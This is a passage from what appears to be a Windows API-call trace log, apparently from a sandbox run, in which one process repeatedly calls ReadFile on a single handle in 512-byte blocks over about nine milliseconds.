lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.945] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, 
lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.946] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile 
(in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 
[0142.947] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, 
lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.948] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, 
lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.949] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: 
lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.950] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, 
lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.951] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.952] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.953] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, 